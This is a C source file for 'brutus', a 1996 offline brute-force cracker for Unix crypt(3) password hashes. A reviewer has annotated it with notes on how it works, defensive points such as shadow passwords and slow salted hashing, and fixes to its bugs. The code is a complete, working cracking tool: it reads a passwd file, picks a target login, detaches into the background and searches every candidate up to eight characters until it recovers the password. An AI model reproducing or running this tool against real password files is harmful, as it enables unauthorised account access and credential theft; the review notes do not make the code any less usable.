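/*
 *
 * brutus.c (C) 1996 ASS
 *
 * some quite brutal way to crack password =)
 *
 * This program tests all the possibilities for a unix password
 * (unix passwords can't be decrypted)
 * The process might take months (!) before succeeding
 * - it depends on the speed of the processor -
 *
 * Here is the only thing to configure to your needs:
 *
 */

/*
 * Review notes (added in review; the surrounding comments are the author's):
 *
 * - What it is: an exhaustive offline search against a single crypt(3) hash
 *   read from a passwd-format file. Each candidate is hashed with the stored
 *   hash as the crypt() setting string and compared with the stored value.
 * - Why it matters for defence: the search needs nothing but read access to
 *   the hash. Keeping hashes out of world-readable files (shadow passwords)
 *   and storing them with a salted, deliberately slow scheme are what make
 *   this kind of search impractical.
 * - The search covers eight positions only. Traditional DES-based crypt(3)
 *   ignores everything after the eighth character, which is presumably why
 *   the author stops there; with other schemes a longer password simply ends
 *   in the "more than 8 characters" message.
 * - Host artefacts visible in the code: the worker detaches from the terminal
 *   with fork() + setsid(), is CPU-bound until it finishes, and writes its
 *   result to the output file named at the prompt.
 * - Fixed in this revision: mismatched fprintf() arguments on the NOT FOUND
 *   path (undefined behaviour), unchecked fgets() and crypt() results,
 *   buffered output duplicated across fork(), the parent reporting its own
 *   pid instead of the worker's, and `void main`.
 * - The header names after each #include were missing from the reviewed
 *   copy; the five below are reconstructed from the functions the code calls.
 */

/*
 * NOTE(review): the literal below contains a space between 'r' and 'q'. The
 * author's comment lists space as an optional addition, so this may be a
 * line-wrap artefact of the copy. Left exactly as found.
 */
#define POSS "&~#\"'{([-|`_\\^@)}]=+$%*?;.,:/!<>9876543210ZYXWVUTSRQPONMLKJIHGFEDCBAzyxwvutsr qponmlkjihgfedcba"

/*
 *
 * This POSS define contains all the characters to test,
 * these are the most used ones.
 * I know that is weird but i count backward, that's why it's reversed :p
 * (anyway it doesn't change anything if you reverse it huh).
 *
 * Feel free to add other weird characters like space,tab, or:
 * &~#"'{([-|`_\^@)}]=+$%*?;.,:/!<>
 * BUT keep in mind that each added character slows down the process :(
 *
 *
 * in the future, i might make some multi-processor version heh :D
 *
 */

/****************************************************************************
 here is the little piece of shit i made (send flames to root@127.0.0.1)
 ****************************************************************************/

/* Needed so that strict -std modes still declare fgetpwent() and crypt();
 * without a prototype crypt() would be assumed to return int. */
#define _GNU_SOURCE

#include <stdio.h>
#include <stdlib.h>
#include <string.h>
#include <pwd.h>
#include <unistd.h>

/* Report a failed library call through perror() and exit with status -1,
 * the status the original used for every error path. */
static void die(const char *what)
{
    perror(what);
    exit(-1);
}

/*
 * Read one line from stdin into buf (at most size-1 characters) and strip
 * the trailing newline. Exits if no input is available, so the caller never
 * inspects an uninitialised buffer.
 */
static void read_line(char *buf, int size)
{
    if (fgets(buf, size, stdin) == NULL) {
        fprintf(stderr, "unexpected end of input\n");
        exit(-1);
    }
    /* fgets() stops at the first newline, so this removes at most the
     * final character and is a no-op on an empty string. */
    buf[strcspn(buf, "\n")] = '\0';
}

/*
 * Prompt for a passwd-format file, a login name and an output file, then
 * detach and try every candidate built from POSS against that login's hash.
 * The result (or a NOT FOUND record) is written to the output file.
 *
 * argc and argv are accepted but not used.
 * Returns 0 after the search; exits with -1 on any setup error.
 */
int main(int argc, char **argv)
{
    static const char possible[] = POSS;
    /* Index np selects the string terminator, which is how candidates
     * shorter than eight characters are produced by the loops below. */
    const short np = (short)(sizeof possible - 1);

    char pwn[256];
    char login[16];
    char outn[256];
    char key[16];
    FILE *pwf;
    FILE *outf;
    struct passwd *pw;
    pid_t st;
    short c, d, e, f, g, h, i, j;

    (void)argc;
    (void)argv;

    printf("(C) 1996 ASS\n");

    printf("password file: ");
    read_line(pwn, 255);
    pwf = fopen(pwn, "r");
    if (pwf == NULL)
        die("fopen");

    printf("login to crack: ");
    /* NOTE(review): a login longer than 14 characters is cut short here and
     * the remainder is consumed by the next prompt. */
    read_line(login, 15);

    /* Skip entries until the requested login is found or the file ends. */
    while ((pw = fgetpwent(pwf)) != NULL && strcmp(pw->pw_name, login) != 0)
        ;
    if (pw == NULL) {
        printf("login not found in file %s\n", pwn);
        exit(-1);
    }
    /* NOTE(review): pw is still used after the stream is closed; this relies
     * on fgetpwent() returning storage that is independent of the FILE.
     * Confirm for the target libc. */
    fclose(pwf);

    printf("output file: ");
    read_line(outn, 255);
    outf = fopen(outn, "w");
    if (outf == NULL)
        die("fopen");

    fprintf(outf, "*** brutus password cracking (C) 1996 ASS ***\n");
    fprintf(outf, "%s:", pw->pw_name);

    /* Flush every stream before fork(): otherwise parent and child both hold
     * the buffered header and it reaches the output file twice. */
    fflush(NULL);

    st = fork();
    if (st < 0)
        die("fork");
    if (st > 0) {
        /* In the parent, st is the worker's pid; getpid() here would name
         * the process that is about to exit. */
        printf("process with pid %d running in the background\n", (int)st);
        exit(0);
    }

    /* Child: start a new session so the search outlives the terminal. */
    setsid();

    /* key[8..15] stay zero, so the candidate is always terminated. */
    memset(key, 0, sizeof key);

    for (c = np; c >= 0; c--) {
        key[7] = possible[c];
        for (d = np; d >= 0; d--) {
            key[6] = possible[d];
            for (e = np; e >= 0; e--) {
                key[5] = possible[e];
                for (f = np; f >= 0; f--) {
                    key[4] = possible[f];
                    for (g = np; g >= 0; g--) {
                        key[3] = possible[g];
                        for (h = np; h >= 0; h--) {
                            key[2] = possible[h];
                            for (i = np; i >= 0; i--) {
                                key[1] = possible[i];
                                for (j = np; j >= 0; j--) {
                                    const char *hash;

                                    key[0] = possible[j];

                                    /* crypt() returns NULL when it rejects
                                     * the setting string; comparing against
                                     * NULL would crash. */
                                    hash = crypt(key, pw->pw_passwd);
                                    if (hash != NULL &&
                                        strcmp(pw->pw_passwd, hash) == 0) {
                                        fprintf(outf, "%s:%lu:%lu:%s:%s:%s\n",
                                                key,
                                                (unsigned long)pw->pw_uid,
                                                (unsigned long)pw->pw_gid,
                                                pw->pw_gecos, pw->pw_dir,
                                                pw->pw_shell);
                                        fprintf(outf, "*** the end ***");
                                        fclose(outf);
                                        exit(0);
                                    }
                                }
                            }
                        }
                    }
                }
            }
        }
    }

    /* The original passed `key` as the first argument to a format that
     * starts with %d, shifting every following argument (undefined
     * behaviour). The argument list now matches the format. */
    fprintf(outf, "NOT FOUND:%lu:%lu:%s:%s:%s\n",
            (unsigned long)pw->pw_uid, (unsigned long)pw->pw_gid,
            pw->pw_gecos, pw->pw_dir, pw->pw_shell);
    fprintf(outf, "\n*** password more than 8 characters long ***");
    fclose(outf);
    return 0;
}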